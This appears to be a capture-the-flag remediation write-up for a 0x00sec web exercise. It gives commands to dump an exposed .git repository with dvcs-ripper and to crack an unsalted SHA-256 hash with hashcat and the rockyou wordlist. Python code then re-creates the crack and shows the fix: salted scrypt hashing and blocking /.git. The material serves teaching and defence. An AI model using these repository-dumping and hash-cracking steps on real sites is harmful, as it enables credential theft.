0x00sec CTF Exercise #1 Remediation

The Attack

Anyway, let’s get straight to it. You can find the exercise here. As noted, there are multiple ways to solve this. The first exercise is about web security. It looks like this.

[Screenshot of the exercise page: "0x00sec Exercise #1", "Bootstrap", "A hint!"]
# Step 1: the site serves its .git directory, so dump the repository with dvcs-ripper
git clone https://github.com/kost/dvcs-ripper.git
cd dvcs-ripper/
./rip-git.pl -v -u https://exercise-1.0x00sec.dev/.git

# Step 2: build hashcat from source (the build has to run inside the hashcat checkout)
git clone https://github.com/hashcat/hashcat.git
cd hashcat/
make && make install

# Step 3: crack the recovered hash. -a 0 is a straight dictionary attack, -m 1400 is raw
# (unsalted) SHA-256; rockyou is the wordlist and hob064 is the mangling rule set
gunzip rockyou.txt.gz
hashcat -a 0 -m 1400 ~/Desktop/hash.txt ~/Downloads/Hob0Rules-master/wordlists/rockyou.txt -r ~/Downloads/Hob0Rules-master/hob064.rule -o ~/Desktop/cracked.txt

Remediation

Now that you see how the login is obtained, we want to make sure this doesn’t happen to our client. What can we do?
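As an added example, not code from the original post or from 0x00sec, the Python below re-creates the cracking step of the attack on a constructed target and puts the fix for password storage next to it. The wordlist and the mangling rules are small stand-ins in the spirit of rockyou.txt and hob064.rule, not the real files, and the `scrypt$N$r$p$salt$digest` record format is this example's own. The last function runs the same dictionary-and-rule attack against the hardened record to show what the fix does and does not buy you.

```python
import hashlib
import hmac
import secrets
from typing import Iterator, Optional, Tuple

# Constructed stand-in for rockyou.txt: a few common base words (assumption, not the real list).
WORDLIST = ["password", "letmein", "summer", "dragon", "welcome"]


def mangle(word: str) -> Iterator[str]:
    """A few mangling rules in the spirit of a hashcat rule file (not hob064 itself)."""
    yield word                        # ":"       unchanged
    yield word.capitalize()           # "c"       capitalise first letter
    yield word + "1"                  # "$1"      append a digit
    yield word + "123"                # "$1$2$3"
    yield word.capitalize() + "!"     # "c$!"
    yield word.capitalize() + "2019"  # "c$2$0$1$9"


def raw_sha256(password: str) -> str:
    """How the exercise stored its password: one unsalted SHA-256 (hashcat -m 1400)."""
    return hashlib.sha256(password.encode()).hexdigest()


def crack_raw_sha256(target_hex: str) -> Optional[str]:
    """Dictionary + rule attack, the idea behind `hashcat -a 0 -m 1400 hash.txt rockyou.txt -r hob064.rule`.

    Each guess costs one fast hash, and because there is no salt the same guesses
    are reusable against every user whose hash was stored this way."""
    for word in WORDLIST:
        for candidate in mangle(word):
            if raw_sha256(candidate) == target_hex:
                return candidate
    return None


# Remediation: a random per-user salt plus a deliberately slow, memory-hard KDF.
# scrypt ships in the standard library; Argon2id (third-party package) is the other
# common choice. The parameters are a modest demo setting, not production tuning.
SCRYPT_N, SCRYPT_R, SCRYPT_P = 2 ** 14, 8, 1


def hash_password(password: str, salt: Optional[bytes] = None) -> str:
    """Return a self-describing record: scrypt$N$r$p$salt$digest (format is this example's own)."""
    salt = salt if salt is not None else secrets.token_bytes(16)
    digest = hashlib.scrypt(password.encode(), salt=salt,
                            n=SCRYPT_N, r=SCRYPT_R, p=SCRYPT_P, dklen=32)
    return f"scrypt${SCRYPT_N}${SCRYPT_R}${SCRYPT_P}${salt.hex()}${digest.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Re-derive with the stored salt and parameters; compare in constant time."""
    parts = stored.split("$")
    if len(parts) != 6 or parts[0] != "scrypt":
        return False
    _, n, r, p, salt_hex, digest_hex = parts
    digest = hashlib.scrypt(password.encode(), salt=bytes.fromhex(salt_hex),
                            n=int(n), r=int(r), p=int(p), dklen=32)
    return hmac.compare_digest(digest.hex(), digest_hex)


def attack_scrypt_record(stored: str) -> Tuple[Optional[str], int]:
    """The same dictionary + rule attack against the hardened record.

    It still finds a password that the wordlist and rules reach, but every guess
    now costs a full scrypt derivation and is tied to one salt, i.e. one user.
    Returns (recovered password or None, number of guesses tried)."""
    tried = 0
    for word in WORDLIST:
        for candidate in mangle(word):
            tried += 1
            if verify_password(candidate, stored):
                return candidate, tried
    return None, tried


if __name__ == "__main__":
    weak = "Summer2019"  # constructed: a password the rules reach from "summer"
    print("raw sha256 cracked:", crack_raw_sha256(raw_sha256(weak)))
    record = hash_password(weak)
    print("scrypt record:", record)
    print("verify:", verify_password(weak, record), verify_password("Summer2018", record))
    print("attack on scrypt record:", attack_scrypt_record(record))
    strong = "correct horse battery staple"
    print("strong password:", crack_raw_sha256(raw_sha256(strong)),
          attack_scrypt_record(hash_password(strong)))
```

Two points the run makes clear: the slow salted hash removes the "crack once, reuse everywhere" property and raises the cost per guess by orders of magnitude, but a password that sits in a wordlist plus a rule still falls, so a length or breach-list check at registration belongs with the KDF. The other half of the fix is the first step of the attack: the site served its `.git` directory, so deploy a build artifact rather than a checkout and deny `/.git` (and other dotfile paths) at the web server, then confirm with a request for `/.git/HEAD` that it no longer returns a `ref: refs/...` line.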
